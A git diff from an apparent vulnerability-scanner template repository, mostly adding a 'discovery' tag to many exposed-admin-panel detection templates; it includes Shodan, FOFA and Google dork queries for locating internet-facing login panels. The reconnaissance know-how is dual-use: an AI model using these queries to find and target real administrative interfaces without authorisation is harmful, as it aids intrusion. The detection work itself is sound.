+ - 'status_code == 200' + - 'contains_all(to_lower(body), "cockpit/", "is_cockpit_client")' + condition: and + + extractors: + - type: regex + part: body + name: os + group: 1 + regex: + - '(?i)"PRETTY_NAME"\s*:\s*"(.*?)"' + internal: true + + - type: regex + part: body + name: hostname + group: 1 + regex: + - '(?i)"hostname"\s*:\s*"(.*?)"' + internal: true + + - type: dsl + dsl: - '"OS: " + os + " | Hostname: " + hostname' # digest: 4b0a00483046022100c3713a8e5bcdf794bbd1a1f8d31f0c93ce257611627b837f037d7924e1868d75022100c99f77c18aaafcdf9b777616088365821cf382cde38e0d2cb14020d12aabf0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index 08b0fe4539c..bef004f757d 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"code-server login" fofa-query: title="code-server login" google-query: intitle:"code-server login" - tags: panel,detect,misc,coder + tags: panel,detect,misc,coder,discovery http: - method: GET diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index 894b09357eb..0ea5dc60d5c 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: code42 product: code42 - tags: panel,code42 + tags: panel,code42,discovery http: - method: GET diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index a4ccd4143f6..e1a4f8fa35a 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: wibu product: codemeter - tags: codemeter,webadmin,panel,wibu + tags: codemeter,webadmin,panel,wibu,discovery http: - method: GET diff --git a/http/exposed-panels/cofense-vision-panel.yaml b/http/exposed-panels/cofense-vision-panel.yaml index a56b69aa56c..b6554e7f4a2 100644 --- a/http/exposed-panels/cofense-vision-panel.yaml +++ b/http/exposed-panels/cofense-vision-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:739801466 - tags: panel,cofense,vision + tags: panel,cofense,vision,discovery http: - method: GET diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 160f9ab7337..e6eb550b52c 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -22,7 +22,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: panel,coldfusion,adobe + tags: panel,coldfusion,adobe,discovery http: - method: GET diff --git a/http/exposed-panels/commvault-panel.yaml b/http/exposed-panels/commvault-panel.yaml index 0642269aa64..0d47f29b777 100644 --- a/http/exposed-panels/commvault-panel.yaml +++ b/http/exposed-panels/commvault-panel.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-542502280 - tags: panel,commvault,backup,login,detect + tags: panel,commvault,backup,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index 76dd02913d9..afe4ed2d5e5 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: compal product: ch7465lg_firmware - tags: panel,compal + tags: panel,compal,discovery http: - method: GET diff --git a/http/exposed-panels/compalex-panel-detect.yaml b/http/exposed-panels/compalex-panel-detect.yaml index 38fd2521124..c77b2f4aa93 100644 --- a/http/exposed-panels/compalex-panel-detect.yaml +++ b/http/exposed-panels/compalex-panel-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 15 shodan-query: title:"COMPALEX" - tags: tech,php,compalex,sql,panel + tags: tech,php,compalex,sql,panel,discovery http: - method: GET diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 2ca451c0d47..2a93fcd8aa2 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"CompleteView Web Client" - tags: panel,completeview + tags: panel,completeview,discovery http: - method: GET diff --git a/http/exposed-panels/concourse-ci-panel.yaml b/http/exposed-panels/concourse-ci-panel.yaml index 116a5c9e70c..7966ac3be51 100644 --- a/http/exposed-panels/concourse-ci-panel.yaml +++ b/http/exposed-panels/concourse-ci-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Concourse" product: concourse vendor: pivotal_software - tags: panel,concourse,oss + tags: panel,concourse,oss,discovery http: - method: GET diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index 27a7313a09d..7a0d3d16d54 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"concrete5" - intitle:"install concrete5" - tags: panel,install,concrete,cms,concrete5 + tags: panel,install,concrete,cms,concrete5,discovery http: - method: GET diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 28fe7b8cc20..bcc84dd28a1 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -23,7 +23,7 @@ info: google-query: - intitle:"concrete5" - intitle:"install concrete5" - tags: panel,concrete5,cms + tags: panel,concrete5,cms,discovery http: - method: GET diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index 0aa4c1e1f9f..8e3ec4dac37 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: - NET-DK/1.0 - net-dk/1.0 - tags: panel,connectbox,iot,upc + tags: panel,connectbox,iot,upc,discovery http: - method: GET diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 40445efa43c..0ffcef44ebc 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.component:zk http.title:"Server Backup Manager" - tags: panel,connectwise,backup + tags: panel,connectwise,backup,discovery http: - method: GET diff --git a/http/exposed-panels/connectwise-panel.yaml b/http/exposed-panels/connectwise-panel.yaml index e1456579f0b..8c1fda511b6 100644 --- a/http/exposed-panels/connectwise-panel.yaml +++ b/http/exposed-panels/connectwise-panel.yaml @@ -19,7 +19,7 @@ info: - icon_hash=-82958153 hunter-query: app.name="connectwise screenconnect software" zoomeye-query: app="screenconnect remote management software" - tags: screenconnect,panel,connectwise,detect + tags: screenconnect,panel,connectwise,detect,discovery http: - method: GET diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index 2bc46f89651..a574de60b75 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -23,7 +23,7 @@ info: - title="contao" - body="contao open source cms" google-query: intitle:"contao" - tags: panel,contao + tags: panel,contao,discovery http: - method: GET diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 1564b19600a..aaf26c6dd90 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"Content Central Login" - tags: panel,content-central + tags: panel,content-central,discovery http: - method: GET diff --git a/http/exposed-panels/contentkeeper-detect.yaml b/http/exposed-panels/contentkeeper-detect.yaml index 7ad28d2930c..87b888344d1 100644 --- a/http/exposed-panels/contentkeeper-detect.yaml +++ b/http/exposed-panels/contentkeeper-detect.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: contentkeeper,panel + tags: contentkeeper,panel,discovery http: - method: GET diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 135f99dfa12..5e05ec3194b 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -16,7 +16,7 @@ info: product: corebos shodan-query: http.html:"corebos" fofa-query: body="corebos" - tags: panel,corebos + tags: panel,corebos,discovery http: - method: GET diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index 59082413384..e37bc81529c 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Cortex XSOAR" fofa-query: title="cortex xsoar" google-query: intitle:"cortex xsoar" - tags: panel,soar,login,paloaltonetworks,detect + tags: panel,soar,login,paloaltonetworks,detect,discovery http: - method: GET diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 1e4255ac69a..a9d1bad7a37 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -16,7 +16,7 @@ info: shodan-query: - product:"couchdb" - cpe:"cpe:2.3:a:apache:couchdb" - tags: panel,couchdb,apache + tags: panel,couchdb,apache,discovery http: - method: GET diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index 8cfed330d57..67f5cdfe937 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -16,7 +16,7 @@ info: shodan-query: - product:"couchdb" - cpe:"cpe:2.3:a:apache:couchdb" - tags: panel,apache,couchdb + tags: panel,apache,couchdb,discovery http: - method: GET diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml index eb9dc5ba996..f2af28c0790 100644 --- a/http/exposed-panels/cox-business-panel.yaml +++ b/http/exposed-panels/cox-business-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Cox Business" - tags: cox,gateway,login,panel + tags: cox,gateway,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index c84282d83b0..9da285e21f8 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"cpanel - api codes" - intitle:"cpanel" - tags: panel,cpanel + tags: panel,cpanel,discovery http: - method: GET diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 2bef7034d9e..a541cf24d33 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -17,7 +17,7 @@ info: - 'X-Powered-By: Craft CMS' - "x-powered-by: craft cms" - 'x-powered-by: craft cms html:"seomatic"' - tags: panel,craftcms,nystudio107 + tags: panel,craftcms,nystudio107,discovery http: - method: GET diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index aed721715a9..09a07ac7d66 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -16,7 +16,7 @@ info: vendor: craftercms product: craftercms shodan-query: http.title:"craftercms" - tags: panel,craftercms,login,detect + tags: panel,craftercms,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/creatio-login-panel.yaml b/http/exposed-panels/creatio-login-panel.yaml index d1bca0b3336..185f8f055bd 100644 --- a/http/exposed-panels/creatio-login-panel.yaml +++ b/http/exposed-panels/creatio-login-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Creatio" - tags: panel,creatio + tags: panel,creatio,discovery http: - method: GET diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index 7fae326bdd3..93faf6114c1 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Crontab UI" - tags: exposure,crontab,ui,panel + tags: exposure,crontab,ui,panel,discovery http: - method: GET diff --git a/http/exposed-panels/crush-ftp-login.yaml b/http/exposed-panels/crush-ftp-login.yaml index 182b593a886..bb962dedc5d 100644 --- a/http/exposed-panels/crush-ftp-login.yaml +++ b/http/exposed-panels/crush-ftp-login.yaml @@ -18,7 +18,7 @@ info: product: crushftp shodan-query: http.html:"crushftp" fofa-query: body="crushftp" - tags: panel,edb,crushftp,detect + tags: panel,edb,crushftp,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cryptobox-panel.yaml b/http/exposed-panels/cryptobox-panel.yaml index d2e9151b30c..9e676d457e5 100644 --- a/http/exposed-panels/cryptobox-panel.yaml +++ b/http/exposed-panels/cryptobox-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Cryptobox" - tags: panel,cryptobox,login,detect + tags: panel,cryptobox,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/csod-panel.yaml b/http/exposed-panels/csod-panel.yaml index 48c6bb7a7cf..1ec0a06c73e 100644 --- a/http/exposed-panels/csod-panel.yaml +++ b/http/exposed-panels/csod-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,csod + tags: panel,csod,discovery http: - method: GET diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index 7fe278ecce3..b3e89f20c9c 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"CudaTel" - tags: panel,cudatel + tags: panel,cudatel,discovery http: - method: GET diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 44262e8c84d..72af887a7ef 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 5 shodan-query: http.html:"Cvent Inc" - tags: panel,cvent + tags: panel,cvent,discovery http: - method: GET diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index 6a033ed0ee0..f78fb3207fc 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -14,7 +14,7 @@ info: fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" product: webpanel vendor: control-webpanel - tags: panel,centos + tags: panel,centos,discovery http: - method: GET diff --git a/http/exposed-panels/cx-cloud-login.yaml b/http/exposed-panels/cx-cloud-login.yaml index fbbc528c591..e18973d4b5c 100644 --- a/http/exposed-panels/cx-cloud-login.yaml +++ b/http/exposed-panels/cx-cloud-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,cx + tags: panel,cx,discovery http: - method: GET diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 0ce3a589db1..66424bea1e8 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -16,7 +16,7 @@ info: vendor: gchq product: cyberchef shodan-query: title:"CyberChef" - tags: panel,cyberchef,login,detect + tags: panel,cyberchef,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index e1660e93037..b61b18fd9c5 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -22,7 +22,7 @@ info: - intitle:"Cyberoam SSL VPN Portal" - intitle:"cyberoam ssl vpn portal" fofa-query: title="cyberoam ssl vpn portal" - tags: panel,cyberoam,vpn,sophos + tags: panel,cyberoam,vpn,sophos,discovery http: - method: GET diff --git a/http/exposed-panels/cyberpanel-panel.yaml b/http/exposed-panels/cyberpanel-panel.yaml index d88c78b31f9..bf90ca06f06 100644 --- a/http/exposed-panels/cyberpanel-panel.yaml +++ b/http/exposed-panels/cyberpanel-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: html:"cyberpanel" fofa-query: app="Cyberpanel" product: cyberpanel - tags: cyberpanel,panel,login,detect + tags: cyberpanel,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/d-link-wireless.yaml b/http/exposed-panels/d-link-wireless.yaml index 8bd0da45ac7..7e39a3e4460 100644 --- a/http/exposed-panels/d-link-wireless.yaml +++ b/http/exposed-panels/d-link-wireless.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dlink,router,edb,panel + tags: dlink,router,edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index 74b82922953..2dada51b1b4 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.favicon.hash:1653394551 product: sd22204db-gny-w vendor: dahuasecurity - tags: edb,panel,dahua,detect + tags: edb,panel,dahua,detect,discovery http: - method: GET diff --git a/http/exposed-panels/danswer-panel.yaml b/http/exposed-panels/danswer-panel.yaml index 47013a7ccc0..9984da9832f 100644 --- a/http/exposed-panels/danswer-panel.yaml +++ b/http/exposed-panels/danswer-panel.yaml @@ -14,7 +14,7 @@ info: vendor: danswer-ai product: danswer fofa-query: icon_hash="484766002" - tags: panel,login,danswer,detect + tags: panel,login,danswer,detect,discovery http: - method: GET diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index a17335c6b02..9aab7e064c6 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -18,7 +18,7 @@ info: - html:"Darktrace Threat Visualizer" - http.html:"darktrace threat visualizer" fofa-query: body="darktrace threat visualizer" - tags: panel,darktrace + tags: panel,darktrace,discovery http: - method: GET diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index b44a6d74054..700f9f75d34 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -15,7 +15,7 @@ info: product: dashy shodan-query: http.favicon.hash:-1013024216 fofa-query: icon_hash=-1013024216 - tags: panel,dashy,detect + tags: panel,dashy,detect,discovery http: - method: GET diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 9c42da3d250..4de9a7b1405 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Datadog" - tags: panel,datadog + tags: panel,datadog,discovery http: - method: GET diff --git a/http/exposed-panels/dataease-panel.yaml b/http/exposed-panels/dataease-panel.yaml index 2bc7a5590c8..caf2e74e2fa 100644 --- a/http/exposed-panels/dataease-panel.yaml +++ b/http/exposed-panels/dataease-panel.yaml @@ -19,7 +19,7 @@ info: - html:"Dataease" - http.html:"dataease" fofa-query: body="dataease" - tags: login,panel,dataease + tags: login,panel,dataease,discovery http: - method: GET diff --git a/http/exposed-panels/datagerry-panel.yaml b/http/exposed-panels/datagerry-panel.yaml index 07d48d8c0fc..f6efb12148c 100644 --- a/http/exposed-panels/datagerry-panel.yaml +++ b/http/exposed-panels/datagerry-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"datagerry" fofa-query: title="datagerry" google-query: intitle:"datagerry" - tags: panel,login,datagerry,detect + tags: panel,login,datagerry,detect,discovery http: - method: GET diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 8d3a4b8b056..f630a179c81 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"dataiku" product: data_science_studio vendor: dataiku - tags: panel,dataiku + tags: panel,dataiku,discovery http: - method: GET diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 0ae0c444362..22a0639237e 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Davantis" - tags: panel,davantis + tags: panel,davantis,discovery http: - method: GET diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 7718807d20b..a969ca2211e 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"daybyday" fofa-query: title="daybyday" google-query: intitle:"daybyday" - tags: panel,daybyday,daybydaycrm + tags: panel,daybyday,daybydaycrm,discovery http: - method: GET diff --git a/http/exposed-panels/dbgate-panel.yaml b/http/exposed-panels/dbgate-panel.yaml index 903050b65f7..5bdaac1b4a7 100644 --- a/http/exposed-panels/dbgate-panel.yaml +++ b/http/exposed-panels/dbgate-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1198579728 - tags: panel,dbgate,oss + tags: panel,dbgate,oss,discovery http: - method: GET diff --git a/http/exposed-panels/dbt-docs-panel.yaml b/http/exposed-panels/dbt-docs-panel.yaml index d293240d8a5..4e0dc01e371 100644 --- a/http/exposed-panels/dbt-docs-panel.yaml +++ b/http/exposed-panels/dbt-docs-panel.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"dbt Docs" - tags: panel,dbt + tags: panel,dbt,discovery http: - method: GET diff --git a/http/exposed-panels/deepmail-panel.yaml b/http/exposed-panels/deepmail-panel.yaml index 4c5e9ea9715..34bf2470213 100644 --- a/http/exposed-panels/deepmail-panel.yaml +++ b/http/exposed-panels/deepmail-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.title:"Advanced eMail Solution DEEPMail" verified: true - tags: panel,deepmail,login,detect + tags: panel,deepmail,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/defectdojo-panel.yaml b/http/exposed-panels/defectdojo-panel.yaml index 13dd76de7f3..e69f7c28633 100644 --- a/http/exposed-panels/defectdojo-panel.yaml +++ b/http/exposed-panels/defectdojo-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"DefectDojo Logo" product: defectdojo vendor: owasp - tags: panel,defectdojo + tags: panel,defectdojo,discovery http: - method: GET diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index 18e165acd90..3ef96cabedf 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Dell Remote Management Controller" - tags: panel,bmc,dell,login + tags: panel,bmc,dell,login,discovery http: - method: GET diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index c3499f6c777..e829bc0ac23 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"thisIDRACText" product: emc_idrac_service_module vendor: dell - tags: panel,idrac,dell,detect + tags: panel,idrac,dell,detect,discovery http: - method: GET diff --git a/http/exposed-panels/dell-openmanager-login.yaml b/http/exposed-panels/dell-openmanager-login.yaml index ca31026bd2e..186ac58f55b 100644 --- a/http/exposed-panels/dell-openmanager-login.yaml +++ b/http/exposed-panels/dell-openmanager-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"Dell OpenManage Switch Administrator" product: openmanage vendor: dell - tags: panel,dell + tags: panel,dell,discovery http: - method: GET diff --git a/http/exposed-panels/dell-remote-web-access-panel.yaml b/http/exposed-panels/dell-remote-web-access-panel.yaml index 0762b7cf7dd..b73d667459d 100644 --- a/http/exposed-panels/dell-remote-web-access-panel.yaml +++ b/http/exposed-panels/dell-remote-web-access-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: title="Dell Remote web" - tags: dell,remote-web,panel,login + tags: dell,remote-web,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 7d4da808f4b..54cfda7c4aa 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: dell product: wyse_management_suite - tags: panel,dell,login + tags: panel,dell,login,discovery http: - method: GET diff --git a/http/exposed-panels/delta-login-panel.yaml b/http/exposed-panels/delta-login-panel.yaml index 48b37ebde33..8a0d0a00d55 100644 --- a/http/exposed-panels/delta-login-panel.yaml +++ b/http/exposed-panels/delta-login-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.html:"Delta Controls ORCAview" - tags: panel,delta + tags: panel,delta,discovery http: - method: GET diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index 2a5a3ada5e9..b8d97e3035b 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"deluge webui" fofa-query: title="deluge webui" google-query: intitle:"deluge webui" - tags: panel,deluge,deluge-torrent + tags: panel,deluge,deluge-torrent,discovery http: - method: GET diff --git a/http/exposed-panels/dependency-track-panel.yaml b/http/exposed-panels/dependency-track-panel.yaml index 9c3873b59e8..640b0336546 100644 --- a/http/exposed-panels/dependency-track-panel.yaml +++ b/http/exposed-panels/dependency-track-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Dependency-Track" - tags: panel,login,dependency,track + tags: panel,login,dependency,track,discovery http: - method: GET diff --git a/http/exposed-panels/dericam-login.yaml b/http/exposed-panels/dericam-login.yaml index 677d688e119..9a7057bc6d7 100644 --- a/http/exposed-panels/dericam-login.yaml +++ b/http/exposed-panels/dericam-login.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dericam" - tags: panel,dericam,edb + tags: panel,dericam,edb,discovery http: - method: GET diff --git a/http/exposed-panels/dex-panel.yaml b/http/exposed-panels/dex-panel.yaml index 4e71c83d7a2..6241fb2876e 100644 --- a/http/exposed-panels/dex-panel.yaml +++ b/http/exposed-panels/dex-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"Log in to dex" - tags: dex,sso,panel,login + tags: dex,sso,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml index 4d2bbdf20cd..a7483bddd97 100644 --- a/http/exposed-panels/dialogic-xms-console.yaml +++ b/http/exposed-panels/dialogic-xms-console.yaml @@ -12,7 +12,7 @@ info: vendor: dialogic product: powermedia_xms shodan-query: title:"Dialogic XMS Admin Console" - tags: panel,dialogic,admin,login,detect + tags: panel,dialogic,admin,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/dify-panel.yaml b/http/exposed-panels/dify-panel.yaml index 53e4527ea77..0c9b74cbdf7 100644 --- a/http/exposed-panels/dify-panel.yaml +++ b/http/exposed-panels/dify-panel.yaml @@ -14,7 +14,7 @@ info: vendor: langgenius product: dify fofa-query: icon_hash="97378986" - tags: panel,login,dify,detect + tags: panel,login,dify,detect,discovery http: - method: GET diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index a72c7f8f37a..263a93bcdec 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: "http.favicon.hash:868509217" fofa-query: "icon_hash=\"868509217\"" - tags: digital-watchdog,panel,detect,login,dw,spectrum + tags: digital-watchdog,panel,detect,login,dw,spectrum,discovery http: - method: GET diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index e5071f5234c..a85d1dc509e 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -16,7 +16,7 @@ info: max-request: 2 vendor: rackn product: digital_rebar - tags: rackn,digitalrebar,panel + tags: rackn,digitalrebar,panel,discovery http: - method: GET diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index a254732ae1f..475b5ff2c70 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"directadmin login" fofa-query: title="directadmin login" google-query: intitle:"directadmin login" - tags: panel,directadmin + tags: panel,directadmin,discovery http: - method: GET diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 716face6bff..e603b78eded 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -14,7 